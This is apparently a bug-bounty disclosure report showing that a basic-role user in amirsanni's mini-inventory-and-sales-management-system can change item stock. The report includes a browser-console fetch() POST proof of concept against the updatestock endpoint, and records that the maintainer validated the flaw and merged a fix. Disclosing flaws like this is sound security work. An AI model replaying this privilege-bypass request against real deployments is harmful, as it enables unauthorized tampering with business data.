Execution with Unnecessary Privileges in amirsanni/mini-inventory-and-sales-management-system


Reported on

Jul 31st 2021


unprivileged user can update stoke


1. From admin account goto https://1410inc.xyz/mini-inventory-and-sales-management-system/administrators and add new user callled user-B with basic role .
2. Now goto user-B account and here user-B cant see any item.
Now user-B execute bellow javascript code in browser console and it will update a stoke

await fetch("https://1410inc.xyz/mini-inventory-and-sales-management-system/items/updatestock", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0",
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Sec-Fetch-Dest": "empty",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Site": "same-origin"
    "referrer": "https://1410inc.xyz/mini-inventory-and-sales-management-system/items",
    "body": "_iId=824&_upType=newStock&qty=1&desc=New+items+were+purchasedkk",
    "method": "POST",
    "mode": "cors"

Here in this request you need change _iId parameter value to item-id.


user with Basic role can update item-stoke


We have contacted a member of the amirsanni/mini-inventory-and-sales-management-system team and are waiting to hear back a year ago
amirsanni/mini-inventory-and-sales-management-system maintainer validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Amir confirmed that a fix has been merged on ba36f6 a year ago
Amir has been awarded the fix bounty
to join this conversation